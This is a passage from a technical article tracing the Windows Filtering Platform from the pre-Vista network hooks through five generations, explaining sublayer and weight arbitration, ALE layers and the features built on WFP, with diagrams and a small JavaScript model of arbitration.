That is the central claim of this article, and it is the kind of statement that sounds like marketing until you trace the actual wires. Trace them once and you stop seeing "Windows Defender Firewall" and "IPsec" and "Windows containers" as separate products. They are all clients of the same kernel/user-mode service, configuring the same filter engine, arbitrated by the same Base Filtering Engine, classified across the same approximately sixty FWPM_LAYER_* identifiers [@wfp-layers].

Microsoft's cross-mode network-traffic filtering service introduced in Windows Vista and Windows Server 2008. WFP "is designed to replace previous packet filtering technologies such as Transport Driver Interface (TDI) filters, Network Driver Interface Specification (NDIS) filters, and Winsock Layered Service Providers (LSP)" [@wfp-start]. The platform has five components: the Filter Engine, the Base Filtering Engine, a set of kernel-mode shims, callout drivers, and the management API [@wfp-about]. A Windows service named `bfe` that, in Microsoft's own words, "controls the operation of the Windows Filtering Platform" and "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. The BFE is not the Windows Firewall. The Windows Firewall is a separate service (`MpsSvc`) that talks to the BFE.

The naming is the first thing that trips readers. There is a service called BFE and a service called MpsSvc. They live in different rows of Get-Service output. They have different binary backings. The dependency arrow runs one way: MpsSvc requires BFE, never the other direction. That asymmetry, which seems pedantic, turns out to be load-bearing for the rest of the story. WFP is the platform. The firewall is a tenant.

Key idea: The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature -- Windows Defender Firewall with Advanced Security, Windows IPsec, WinNAT and container networking, the Hyper-V Extensible Switch, Microsoft Defender for Endpoint Network Protection, every third-party EDR with a network filter -- is a configuration of the same engine [@forshaw-2021].

If WFP is the engine, what was there before it? Why did Microsoft need to build a platform when Windows XP SP2 had already shipped a firewall?

2. Before WFP -- An Internet on Fire

April 2004. Sasser is propagating through the LSASS RPC interface on port 445, infecting unpatched Windows machines within minutes of their first cable plug. Microsoft has just shipped Windows XP SP2, with the Internet Connection Firewall rebranded as "Windows Firewall" and turned on by default for the first time [@wiki-winfw].Wikipedia notes that "the ongoing prevalence of these worms through 2004 resulted in unpatched machines being infected within a matter of minutes," and that Microsoft "switched it on by default since Windows XP SP2." XP SP2 reached general availability on August 25, 2004 [@wiki-winfw]. That fixed the worm problem. It did not fix the plumbing problem.

The plumbing problem was that third-party security vendors were already hooking the Windows network stack at four different, mutually incompatible places, none of which arbitrated with the others. ZoneAlarm, Norton Internet Security, McAfee, Kerio, Check Point, BlackICE, and a dozen others were shipping kernel drivers that bolted onto Windows wherever they could find a callable surface [@wiki-winfw][@forshaw-2021]. They picked four families.

Network Driver Interface Specification (NDIS) intermediate drivers. NDIS 5.x exposed a profile called the intermediate driver that sat below the protocol stack and above the miniport. A vendor could install a driver that saw every Ethernet frame on the way up and every IP packet on the way down. The price was complexity: NDIS intermediate drivers had to participate in the entire NDIS binding state machine, and Microsoft's own documentation later admitted that the model was painful enough that the platform team replaced it with the much simpler NDIS Lightweight Filter (LWF) in NDIS 6.0 [@ndis-filter].

Filter-hook drivers on \Device\Ipfilterdriver. The IP filter driver exposed a single IOCTL, IOCTL_PF_SET_EXTENSION_POINTER, that registered a single callback function the kernel would invoke on every received or transmitted IP packet [@ipfilter-legacy]. There was one callback pointer per machine. IPv4 only. Network layer only. No documented contract for what happened when a second vendor registered.

Winsock Layered Service Providers (LSPs). A user-mode shim chained into every Winsock application, in process. LSPs had access to per-application context, but their cost was paid in blast radius: Microsoft's own categorisation guide warned that "certain system critical processes such as winlogon and lsass create sockets" and that "a number of cases have also been documented where buggy LSPs can cause lsass.exe to crash. If lsass crashes, the system forces a shutdown" [@lsp-categories].

A user-mode DLL that chains into the Winsock service-provider stack of every process that opens a socket. LSPs were the Windows mechanism for content inspection and per-application network rules before Vista. They are still installable, but Microsoft's documentation now categorises which processes must not load them because of the lsass-crash failure mode [@lsp-categories].

TDI filter drivers. The Transport Driver Interface, the legacy kernel interface above TCP/IP, supported a filter-driver pattern that preserved application identity and could veto connections at the transport. It was the cleanest of the four options. It also stopped being a viable target the moment Microsoft deprecated TDI in Vista: "The TDI feature is deprecated and will be removed in future versions of Microsoft Windows. Depending on how you use TDI, use either the Winsock Kernel (WSK) or Windows Filtering Platform (WFP)" [@tdi-legacy].

Four hooks, four failure modes, no arbitration between any of them. In May 2006 Madhurima Pawar and Eric Stenson of Windows Networking walked the WinHEC audience through one number that captured the consequence: firewall and antivirus conflicts accounted for 12 percent of all Windows operating-system crashes [@pawar-stenson-winhec].

Reduces firewall and anti-virus crashes -- 12% of all OS crashes. -- Madhurima Pawar and Eric Stenson, WinHEC 2006 [@pawar-stenson-winhec]

That is the design motivation for WFP in twelve words. The XP-era hook zoo was not a security architecture; it was a steady source of bluescreens. Microsoft's documentation reads, looking back at the era from Vista: "Starting in Windows Server 2008 and Windows Vista, the firewall hook and the filter hook drivers are not available; applications that were using these drivers should use WFP instead" [@wfp-start]. As Forshaw later summarised it, "these firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone" [@forshaw-2021].

flowchart TD NIC[Physical NIC] --> MINI[NDIS miniport driver] MINI --> IM["NDIS 5.x intermediate driver
(hook #1: NDIS-IM)"] IM --> TCPIP[TCPIP.SYS] TCPIP -.-> IPF["\Device\Ipfilterdriver
(hook #2: filter-hook IOCTL)"] TCPIP --> TDI["TDI transport providers"] TDI --> TDIF["TDI filter driver
(hook #3: TDI filter)"] TDIF --> AFD[AFD.SYS] AFD --> WS2[ws2_32.dll Winsock] WS2 --> LSP["Winsock LSP chain
(hook #4: in-process LSP)"] LSP --> APP[Application]

So why didn't Microsoft just fix the hooks? Why a whole new platform?

3. Why Four Hooks Could Not Be Saved

Picture a Windows XP machine in 2005, four months past SP2. The user, doing what users do, installs two antivirus suites: one from a free trial that came with the laptop, one from work. Each ships a kernel driver. Each one calls IOCTL_PF_SET_EXTENSION_POINTER on \Device\Ipfilterdriver to register a packet-inspection callback [@ipfilter-legacy]. An hour later the machine bluescreens during a Windows Update download.

The Microsoft documentation for the IOCTL is precise about what the call does ("registers filter-hook callback functions to the IP filter driver to inform the IP filter driver to call those filter hook callbacks for every IP packet that is received or transmitted") and silent about what happens if a second driver makes the same call before the first one unregisters [@ipfilter-legacy]. The page does not document chaining semantics. There is no mention of a registration list, a callback array, a refcount, or a priority. The driver writers got to invent that themselves, separately, in shipped products. The crash reports speak for the result.

Note: Microsoft Learn documents the filter-hook registration mechanism on \Device\Ipfilterdriver exactly once, in the legacy reference for IOCTL_PF_SET_EXTENSION_POINTER [@ipfilter-legacy]. The page tells you how to register a callback. It does not tell you what happens when two callers register concurrently. That gap is the architectural bug. The 12-percent-of-OS-crashes number from WinHEC 2006 is the bill [@pawar-stenson-winhec].

Each of the four pre-WFP hooks had a specific architectural flaw. Together those flaws define what WFP had to be.

Filter-hook (IpFilterDriver). One callback pointer per machine; no arbitration; IPv4 only; network layer only. Two security products fight over one callback, and there is no documented way to chain them. Failure: arbitration impossible, vendor coexistence accidental.

NDIS 5.x intermediate driver. High complexity, no application identity (it sees frames, not processes), install-order-dependent binding chains. Microsoft's own assessment of the model, written for the LWF replacement that came in 2006, is: "Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. Failure: too low for app-aware policy, too painful to write.

TDI filter. Preserved application identity. Vetoed connections at the transport boundary. Architecturally the cleanest of the four. Then Microsoft deprecated TDI in Vista [@tdi-legacy] and the substrate evaporated. Failure: the floor disappeared.

Winsock LSP. In-process. User mode. Bypassable by any program that called Nt* system services directly. And, as the Microsoft categorisation page documents, a buggy LSP that crashes LSASS will take down the entire machine [@lsp-categories]. Failure: in process, bypassable, lethal when buggy.

Pre-WFP hook	Layer	App identity	Multi-vendor	Failure mode	Successor
Filter-hook (`IpFilterDriver`)	Network (L3)	No	No documented contract for chaining	Arbitration impossible [@ipfilter-legacy]	WFP filter at `INBOUND_IPPACKET_*`
NDIS 5.x intermediate	Data link (L2)	No	Install-order dependent	Too low for app-aware rules; complex [@ndis-filter]	NDIS Lightweight Filter (LWF)
TDI filter	Transport (L4)	Yes	Yes (chainable)	Substrate deprecated in Vista [@tdi-legacy]	WFP ALE + Winsock Kernel (WSK)
Winsock LSP	Above sockets (user mode)	Yes	Chainable in-process	In-process bypass; lsass blast radius [@lsp-categories]	WFP ALE; LSP retained for non-security uses

Walk those failure modes column by column and a design constraint set falls out. Whatever Microsoft was going to build had to:

Arbitrate multiple vendors deterministically. No more "first IOCTL wins."
Carry application identity through to the inspection point.
Concentrate inspection at one platform, not four.
Run out of process where possible. A buggy callout cannot be allowed to take down LSASS.
Resolve conflicts predictably, with rules a third-party developer can read and design against.

sequenceDiagram participant A as Vendor A installer participant B as Vendor B installer participant K as \Device\Ipfilterdriver participant P as IP packet path A->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_A) Note over K: callback = callback_A B->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_B) Note over K: callback = callback_B (no chaining contract) P->>K: packet arrives K->>B: callback_B(packet) Note over A: callback_A no longer invoked, vendor A stops working A->>K: re-register callback_A Note over K: race: pointer flips again K--xP: inconsistent state, BSOD

Vista shipped November 2006. What did the architects build to satisfy all five constraints at once?

4. The Evolution -- Five Generations of WFP

May 23-25, 2006, Seattle. Madhurima Pawar, Program Manager in Windows Networking, and Eric Stenson, Development Lead in Windows Networking, stand in front of a hostile room of third-party firewall ISVs at WinHEC and present "Windows Filtering Platform And Winsock Kernel: Next-Generation Kernel Networking APIs." Slide 6 carries the design motivation that this article opened on: 12 percent of all OS crashes are firewall and AV conflicts. Slide 7 carries the architecture diagram [@pawar-stenson-winhec]. Six months later Vista shipped, with the filter-hook and firewall-hook drivers gone from the system and a new platform in their place [@wfp-start].Windows Vista was released to manufacturing on November 8, 2006, and made generally available to consumers on January 30, 2007 [@wiki-vista].

Generation 1: WFP v1 in Vista and Server 2008

WFP v1 introduced five named components. They are still the components the platform ships today. Microsoft's own "About Windows Filtering Platform" page enumerates them: the Filter Engine ("the core multi-layer filtering infrastructure, hosted in both kernel-mode and user-mode"); the Base Filtering Engine ("a service that controls the operation of the Windows Filtering Platform"); shims ("kernel-mode components that reside between the kernel-mode network stack and the filter engine"); callout drivers; and the management API [@wfp-about].

The core of WFP. Microsoft's WDK reference defines it as "a component of the Windows Filtering Platform that stores filters and performs filter arbitration. Filters are added to the filter engine at designated filtering layers so that the filter engine can perform the desired filtering action (permit, drop, or a callout). If a filter in the filter engine specifies a callout for the filter's action, the filter engine calls the callout's classifyFn function" [@wfp-filter-engine]. The engine is hosted in both kernel mode and user mode; its kernel classification path runs primarily inside `NETIO.SYS` [@forshaw-2021]. A kernel-mode bridge between a specific network stack module and the WFP filter engine. Vista shipped six shims: the Application Layer Enforcement (ALE) shim, the Transport Layer Module shim, the Network Layer Module shim, the ICMP Error shim, the Discard shim, and the Stream shim [@wfp-about]. Each shim invokes the filter engine at one or more `FWPM_LAYER_*` identifiers when traffic crosses it.

The most consequential of those six shims is ALE.

"A set of Windows Filtering Platform (WFP) kernel-mode layers that are used for stateful filtering" [@wfp-ale]. ALE keeps per-connection state across packets, and -- this is the line that separates ALE from the rest of the platform -- "ALE layers are the only WFP layers where network traffic can be filtered based on the application identity -- using a normalized file name -- and based on the user identity -- using a security descriptor" [@wfp-ale]. ALE is why per-application firewall rules became possible in 2006. It is also the layer that classifies AppContainer connections in modern Windows.

ALE pays for stateful filtering with bandwidth, not latency. The Microsoft Learn page makes the performance claim explicit: at ALE layers, the platform "minimally impacts network performance by processing only the first packet in a connection" [@wfp-about]. Subsequent packets ride the existing flow state. That choice is what lets a per-process firewall rule scale to gigabit network rates.

April 12, 2010. Microsoft ships a Windows Filtering Platform driver hotfix rollup, KB981889, that bundles three previously-separate fixes into one package. The Microsoft Support page enumerates them verbatim [@kb981889]:

KB976759 -- "WFP drivers may cause a failure to disconnect the RDP connection to a multiprocessor computer."

KB979278 -- "Using two Windows Filtering Platform (WFP) drivers causes a computer to crash."

KB979223 -- "A nonpaged pool memory leak occurs when you use a WFP callout driver."

Read KB979278 again. Two WFP drivers cause a crash. The XP-era "two AV vendors fight" bug had survived into the new platform, in a different shape: the WFP arbitration model held -- the conflict between filters was deterministic -- but the callout driver lifecycle had not yet been hardened. That distinction is the structural seed of the BFE elevation-of-privilege CVE class fifteen years later. Section 8 returns to it.

Generation 2: WFP v2 in Windows 8 and Server 2012

Windows 8 and Server 2012 shipped a refresh in 2012. The "What's New in Windows Filtering Platform" page enumerates the delta in four bullets [@wfp-whatsnew]:

"Layer 2 filtering: Provides access to the L2 (MAC) layer, allowing filtering of traffic at that layer. vSwitch filtering: Allows packets traversing a vSwitch to be inspected and/or modified. WFP filters or callouts can be used at the vSwitch ingress and egress. App container management: Allows access to information about app containers and network isolation connectivity issues. IPsec updates: Extended IPsec functionality including connection state monitoring, certificate selection, and key management." [@wfp-whatsnew]

Four features, but the second one -- vSwitch filtering -- is the architecturally significant one. With Windows 8, WFP slid under the Hyper-V Extensible Switch. From that release forward, every Hyper-V VM's packet path is a WFP-extensible classification problem, and the same kernel-mode platform that filters host traffic also filters tenant traffic [@wfp-whatsnew].

Generation 3: Windows 10 ALE redirection (2015-2021)

The Windows 10 family added two ALE layers that did not exist in Vista: CONNECT_REDIRECT and BIND_REDIRECT. The "ALE Layers" page lists them at the bottom of its enumeration [@wfp-ale-layers]. Their job is exactly what their names say -- redirect an outbound connection (proxy it through a different address), or redirect a bind (force a process to bind to a different local endpoint). Web proxies, transparent forwarders, and AppContainer policy now had a kernel-side hook that did not exist before. Forshaw's 2021 Project Zero post documents how the modern Windows Defender Firewall pipeline runs through these layers end-to-end: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel... The evaluation is handled primarily by the NETIO driver as well as registered callout drivers" [@forshaw-2021].

Generation 4: URO and the CVE drumbeat (2022-2024)

The most recent generation comes in two parallel tracks. The first is a hardware offload feature. NDIS 6.89, the version of the NDIS driver interface that "is included in Windows 11, version 24H2 and Windows Server 2022 and later," adds support for UDP Receive Segment Coalescing Offload, "this hardware offload enables NICs to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@ndis-689]. Windows 11 24H2 reached general availability on October 1, 2024 [@wiki-win11-24h2].

The second track is a sequence of elevation-of-privilege CVEs in the Base Filtering Engine. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free with a CVSS base of 7.0 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The 2024 vulnerability's attack-complexity sub-score dropped from AC:H (high) in 2023 to AC:L (low) in 2024. The exploitability sub-score rose from 1.0 to 1.8 over the same interval [@nvd-2023-29368][@nvd-2024-38034]. The trend line is that BFE EoP is getting easier to weaponise, not harder.

flowchart TD UM["User-mode application
(e.g. wf.msc / netsh / MpsSvc)"] --> API["Fwpm* management API
(fwpuclnt.dll)"] API --> BFE["Base Filtering Engine service
(bfe, user mode)"] BFE --> FE["Filter Engine
(kernel + user mode)"] FE --> KCLI["fwpkclnt.sys
(kernel-mode WFP client / export driver)"] FE --> NETIO["NETIO.SYS
(classification path)"] NETIO --> ALE["ALE shim"] NETIO --> TLM["Transport-Layer shim"] NETIO --> NLM["Network-Layer shim"] NETIO --> STREAM["Stream shim"] NETIO --> ICMP["ICMP-Error shim"] NETIO --> DISC["Discard shim"] ALE --> COUT["Callout drivers
(IPsec, in-box stealth, EDR, 3rd-party)"] TLM --> COUT NLM --> COUT STREAM --> COUT ICMP --> COUT DISC --> COUT timeline title Five generations of the Windows Filtering Platform 2006-11 : Windows Vista / Server 2008 -- WFP v1 (filter engine, BFE, six shims, callouts) 2010-04 : KB981889 hotfix rollup -- three named WFP driver bugs, including two-WFP-drivers crash 2012-09 : Windows 8 / Server 2012 -- WFP v2 (L2, vSwitch, AppContainer, IPsec extensions) 2015-21 : Windows 10 -- ALE CONNECT_REDIRECT / BIND_REDIRECT, AppContainer-aware ALE 2023-06 : CVE-2023-29368 published (CWE-415 double-free, CVSS 7.0) 2024-07 : CVE-2024-38034 published (CWE-190 integer overflow, CVSS 7.8) 2024-10 : Windows 11 24H2 -- NDIS 6.89 adds URO (UDP receive coalescing)

Timeline sources, in row order: WinHEC 2006 and the Vista release on the Microsoft Learn WFP start page [@pawar-stenson-winhec][@wfp-start]; KB981889 [@kb981889]; the "What's New" page [@wfp-whatsnew]; ALE Layers [@wfp-ale-layers] and Forshaw 2021 [@forshaw-2021]; the NVD records for CVE-2023-29368 and CVE-2024-38034 [@nvd-2023-29368][@nvd-2024-38034]; NDIS 6.89 introduction and the Windows 11 24H2 GA date [@ndis-689][@wiki-win11-24h2].

Five generations, one engine, no replacements. Why does the same engine still ship in 2026? What is the architectural insight that made it last?

5. Sublayers, Weights, and Veto -- The Arbitration Insight

Here is the question every Windows administrator has wondered: how do two competing security products coexist on the same machine without crashing each other? Before Vista the honest answer was, "they didn't, mostly, and when they did it was an accident." After Vista the honest answer is, "WFP arbitrates them deterministically." The mechanism is the load-bearing piece of the platform, and it is built out of two ideas.

Idea 1: Sublayers and weights

Microsoft's "Filter Arbitration" page describes the algorithm in two sentences that almost no Windows administrator has read:

"Each filter layer is divided into sub-layers ordered by priority (also called weight). Network traffic traverses sub-layers from the highest priority to the lowest priority... Within each sub-layer, filters are ordered by weight. Network traffic is indicated to matching filters from highest weight to lowest weight." [@wfp-arbitration]

A layer (say, FWPM_LAYER_ALE_AUTH_CONNECT_V4, the place where outbound IPv4 TCP connection authorization is decided) contains an ordered list of sublayers. Each sublayer contains an ordered list of filters. Sublayer priority orders the sublayers. Filter weight orders the filters within a sublayer. Network traffic walks the structure top-down, sublayer by sublayer, filter by filter, until a terminal action is reached.

A named, priority-ordered subdivision of a WFP filtering layer. Each sublayer owns a list of filters and has its own GUID. Microsoft's recommendation, in the filter-weight documentation, is that independent vendors "create their own sublayer by using `FwpmSubLayerAdd0`" rather than register filters into another vendor's sublayer [@wfp-weight]. Sublayer priority is what lets two vendors coexist without interfering. A 64-bit value attached to a filter that orders evaluation within a sublayer. The "Filter Weight Assignment" page documents three legal assignment styles: "Set the weight to an FWP_UINT64. BFE uses the supplied weight as is. Set the weight to FWP_EMPTY. BFE automatically generates a weight in the range [0, 2^60). Set the weight to an FWP_UINT8 in the range [0, 15]. BFE uses the supplied weight as a weight range identifier" [@wfp-weight]. Sixteen high-order weight ranges, $[0, 2^{60})$ within each, give vendors a way to carve out non-overlapping neighbourhoods.

The mathematical model is simpler than the prose suggests. Filter weight is an element of $[0, 2^{64})$. A filter at weight $w_1$ runs before a filter at weight $w_2$ inside the same sublayer if $w_1 > w_2$. Sublayer priority orders the sublayers themselves. When a vendor registers its sublayer at, say, priority 0x1000 and chooses filters in the weight range $[2^{60}, 2^{61})$, that vendor has a deterministic neighbourhood that no other vendor will trample, provided the other vendors follow Microsoft's recommendation to call FwpmSubLayerAdd0 and use their own sublayer.The 16-range partitioning via FWP_UINT8 weights is the mechanism that the platform team baked in to give vendors a coordination protocol without requiring vendors to talk to each other. Microsoft Learn's recommendation, verbatim: "This issue can be prevented by having callouts create their own sublayer by using FwpmSubLayerAdd0" [@wfp-weight].

Idea 2: Block-overrides-Permit with Veto

Filter arbitration is actually two passes, not one. Within a single sublayer, the engine evaluates the filters that match in weight order from highest to lowest, and stops at the first filter that returns Permit or Block. That first matching filter wins; lower-weight filters in the same sublayer never run. The engine then performs the same pass on the next sublayer down. Once every sublayer has produced a verdict, the BFE composes those per-sublayer verdicts into one per-layer decision -- and that is where Block-over-Permit and the soft/hard override flag come in. Filter Arbitration states the second pass:

"'Block' overrides 'Permit'. 'Block' is final (cannot be overridden) and stops the evaluation. The packet is discarded." [@wfp-arbitration]

"Block" and "Permit" each come in two variants. The variant is set by a per-action flag, FWPS_RIGHT_ACTION_WRITE, in the callout's classify-output structure: "If the flag is set, it indicates that the action can be overridden. If the flag is absent, the action cannot be overridden" [@wfp-arbitration]. The four-cell table below is the override-policy table the BFE uses to compose per-sublayer verdicts into one layer-level action.

Action	Override allowed?	Common name	What it means
Permit + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft permit	A lower-priority sublayer's verdict (composed later by the BFE) may overturn it [@wfp-arbitration]
Permit, flag absent	No	Hard permit	Final permit; only a callout Veto in another sublayer can block. [@wfp-arbitration]
Block + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft block	A lower-priority sublayer may overturn it, but Block-over-Permit still applies if no override fires [@wfp-arbitration]
Block, flag absent	No	Hard block	Final block. Evaluation stops. Packet discarded. [@wfp-arbitration]

The soft/hard distinction is therefore a cross-sublayer property, not a within-sublayer one. Within a sublayer the rule is "first match wins"; only the composition step between sublayers consults the override flag.

There is a fifth case. A callout that returns FWP_ACTION_BLOCK while it could have returned FWP_ACTION_PERMIT is exercising what the documentation calls a Veto. The callout has been given the opportunity to authorize a packet and has refused. That is how a third-party EDR's deep-inspection callout can refuse a flow that an in-box filter has already soft-permitted, without ever knowing the soft-permit happened: the engine offers the packet, the callout says no, and the no is final.

sequenceDiagram participant E as Filter engine participant S1 as Sublayer @ priority 100 (no matching filter) participant S2 as Sublayer @ priority 50 (winner: soft permit) participant S3 as Sublayer @ priority 10 (winner: hard permit) participant C as Deep-inspection callout (registered in default sublayer) E->>S1: evaluate highest-priority sublayer S1-->>E: no matching filter (Continue) E->>S2: evaluate next sublayer S2-->>E: Soft Permit (FWPS_RIGHT_ACTION_WRITE) Note over E: tentative layer action = Permit (overridable) E->>S3: evaluate next sublayer S3-->>E: Hard Permit (no override flag) Note over E: layer action = Permit (final unless a callout vetoes) E->>C: invoke callout for the permitted flow C-->>E: Veto -> Block (terminal) Note over E: final layer-level action = Block

Walk a worked example. An AppContainer process (an Edge tab, say, or any process launched with CreateProcess and an AppContainer SID token) tries to open an outbound TCP connection to 203.0.113.5:443. The Windows TCP/IP stack invokes the ALE shim, which classifies the connection request at FWPM_LAYER_ALE_AUTH_CONNECT_V4. The filter engine walks the sublayers at that layer from highest priority to lowest. Within each sublayer, filters fire highest-weight-first, and the first matching Permit or Block ends evaluation in that sublayer. If a vendor EDR has placed a Veto-style deep-inspection callout in its own sublayer, the callout runs and can deny the connection regardless of what any other sublayer would have done. If no filter explicitly permits the AppContainer with the matching capability SID (internetClient, internetClientServer, or privateNetworkClientServer), the "Block Outbound Default Rule" filter in the firewall's default sublayer fires last and the connection is denied [@forshaw-2021].

{` // Faithful translation of the Microsoft Learn "Filter Arbitration" algorithm // for the cross-sublayer composition pass. The within-sublayer pass (not // shown) returns one verdict per sublayer using a first-match-wins rule on // weight-ordered filters. This function composes those per-sublayer verdicts // into the layer-level action using FWPS_RIGHT_ACTION_WRITE semantics. // Source: https://learn.microsoft.com/en-us/windows/win32/fwp/filter-arbitration

// Each element is the winning verdict from one sublayer, ordered by sublayer // priority from highest to lowest. const sublayerVerdicts = [ // Vendor EDR deep-inspection callout, hard block on a known-bad destination { sublayer: 'EDR-veto', priority: 100n, match: (pkt) => pkt.dst === '203.0.113.5', verdict: () => HARD_BLOCK }, // Windows Defender Firewall app rule, allow-with-override { sublayer: 'WDF-allow', priority: 50n, match: () => true, verdict: () => SOFT_PERMIT }, // Block Outbound Default Rule (BFE default sublayer) { sublayer: 'block-default',priority: 10n, match: () => true, verdict: () => HARD_BLOCK }, ];

console.log(composeAcrossSublayers({ dst: '203.0.113.5' }, sublayerVerdicts)); // -> { decision: 'Block', by: 'EDR-veto' } (hard block at priority 100)

console.log(composeAcrossSublayers({ dst: '198.51.100.7' }, sublayerVerdicts)); // -> { decision: 'Block', by: 'block-default' } (soft permit overridden by hard block) `}

Key idea: Two competing Windows security products coexist on the same host because each one owns its own sublayer, with its own weight neighbourhood. Within a sublayer the BFE picks one winner using "first matching Permit or Block stops evaluation." Across sublayers the BFE composes those winners using "Block overrides Permit, hard actions are final, soft actions can be overridden." Pre-Vista, Windows had filters. Post-Vista, Windows has arbitration.

The engine arbitrates filters deterministically and separates condition-match (the filter) from action (the callout). What does the modern surface look like, in 2026, with two decades of features bolted on top?

6. The Modern WFP Surface

It is 2026. WFP is twenty years old, has never been replaced, and ships under more components than any other Windows networking primitive. Here is what it looks like today.

The filter engine and its kernel client

The filter engine is the same architectural piece WFP v1 shipped with: a cross-mode classifier whose kernel-mode classification path runs primarily inside NETIO.SYS and whose user-mode side runs inside the Base Filtering Engine service host process [@wfp-arch][@forshaw-2021]. Callouts and filter consumers do not link against NETIO.SYS. They link against a different binary.

The kernel-mode WFP client and export driver. Callout drivers and other kernel components link against `fwpkclnt.lib`, whose in-memory module is `fwpkclnt.sys` [@wfp-arch]. The driver is the API surface that callouts use to register, classify, and call back into the engine. The classification path itself, where filters are matched and actions chosen, runs primarily in `NETIO.SYS`. The shorthand "fwpkclnt.sys *is* the filter engine" is common in blog posts and incorrect; the two binaries do different jobs.

The BFE-vs-MpsSvc split is the second confusion to clear. bfe is the Base Filtering Engine, the platform service [@wfp-about]. MpsSvc is the Windows Defender Firewall service, one consumer of the platform. The dependency goes one way: MpsSvc depends on bfe; bfe does not depend on MpsSvc.You can verify the dependency direction on any running Windows box. Get-Service bfe, Get-Service mpssvc, then Get-Service mpssvc | Select-Object -ExpandProperty ServicesDependedOn will list BFE (among others); the reverse query on bfe lists no dependency on mpssvc. Forshaw's 2021 post documents the same arrow from the policy side: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service" [@forshaw-2021].

Roughly sixty filtering layers

Microsoft's "Management Filtering Layer Identifiers" reference enumerates about sixty FWPM_LAYER_* GUIDs, organised by shim, direction (inbound, outbound, forward), stage (pre-IPsec, post-IPsec, discard), and IP version (v4 / v6) [@wfp-layers]. The reference page is dense, but reading it once teaches the structure. A small sample of representative layers:

FWPM_LAYER_INBOUND_IPPACKET_V4 and _V6. "Located in the receive path just after the IP header of a received packet has been parsed but before any IP header processing takes place. No IPsec decryption or reassembly has occurred" [@wfp-layers]. The earliest visibility a callout has into a received packet.
FWPM_LAYER_OUTBOUND_IPPACKET_V4 and _V6. The send-path twin.
FWPM_LAYER_IPFORWARD_V4 and _V6. The routing-decision point on a forwarding host [@wfp-layers].
FWPM_LAYER_INBOUND_TRANSPORT_V4 and _V6. After the TCP/UDP/ICMP header has been parsed but before payload delivery [@wfp-layers].
FWPM_LAYER_STREAM_V4 and _V6. The TCP stream layer where reassembled byte streams are visible [@wfp-layers].
FWPM_LAYER_DATAGRAM_DATA_V4 and _V6. Connectionless data delivery (UDP / ICMP) [@wfp-layers].
FWPM_LAYER_INBOUND_MAC_FRAME_ETHERNET. Added in Windows 8; the L2 hook the "What's New" page introduced [@wfp-whatsnew].

Each non-DISCARD layer has a DISCARD twin that fires when the engine has decided to drop a packet at that point. Callouts that need to log drops register at the DISCARD layer; callouts that need to inspect or modify register at the non-DISCARD twin [@wfp-layers].

ALE classification

The ALE shim sits across seven FWPM_LAYER_ALE_* filtering layers plus the two redirection layers introduced in the Windows 10 era [@wfp-ale-layers]:

RESOURCE_ASSIGNMENT -- local endpoint assignment (bind).
AUTH_LISTEN -- TCP listen.
AUTH_RECV_ACCEPT -- inbound TCP accept; inbound UDP/ICMP first datagram.
AUTH_CONNECT -- outbound TCP connect; outbound UDP/ICMP first datagram.
FLOW_ESTABLISHED -- the stateful "connection now exists" event.
RESOURCE_RELEASE, ENDPOINT_CLOSURE -- teardown.
CONNECT_REDIRECT, BIND_REDIRECT -- the Windows 10 redirection hooks.

Stateful per-flow context lives in the ALE shim. Application identity at each ALE layer is a normalized file name; user identity is a security descriptor [@wfp-ale]. That pair is what turns "block port 443 outbound" into "block port 443 outbound from chrome.exe running as user S-1-5-21-...."

In-box callouts and downstream features

The "Built-in Callout Identifiers" reference page enumerates the GUIDs of every in-box callout: the FWPM_CALLOUT_IPSEC_* family (transport, tunnel, forward-tunnel, inbound-initiate-secure, ALE-connect); FWPM_CALLOUT_WFP_TRANSPORT_LAYER_V4_SILENT_DROP and _V6_SILENT_DROP; the FWPM_CALLOUT_TCP_CHIMNEY_* callouts [@wfp-builtin-callouts]. Microsoft describes the four canonical roles a callout plays: "Deep Inspection... Packet Modification... Stream Modification... Data Logging" [@wfp-callouts].

A kernel driver that registers one or more callout functions with the filter engine. The engine invokes a callout's `classifyFn` when a filter at a layer specifies the callout's GUID as its action [@wfp-filter-engine]. Callouts implement one of four roles: deep inspection (read-only payload examination), packet modification, stream modification, or data logging [@wfp-callouts]. Every third-party network-security product on Windows that runs in the kernel ships a callout driver.

The downstream features are not peers of WFP. They are configurations of it.

Windows Defender Firewall with Advanced Security (WFAS). Microsoft Learn names this relationship verbatim: "The firewall application that is built into Windows Vista, Windows Server 2008, and later operating systems Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The MpsSvc service translates the WFAS rule database into WFP filters that live in the MPSSVC_WSH provider's sublayer [@forshaw-2021].
Windows IPsec. The Base Filtering Engine "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. IPsec is not a separate stack; it is a configuration of WFP plus the IKE/AuthIP keying modules.
WinNAT and Windows container networking. The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]; WinNAT, the implementation behind it, registers WFP filters to perform the translation. Windows containers use WinNAT for their default NAT switch.
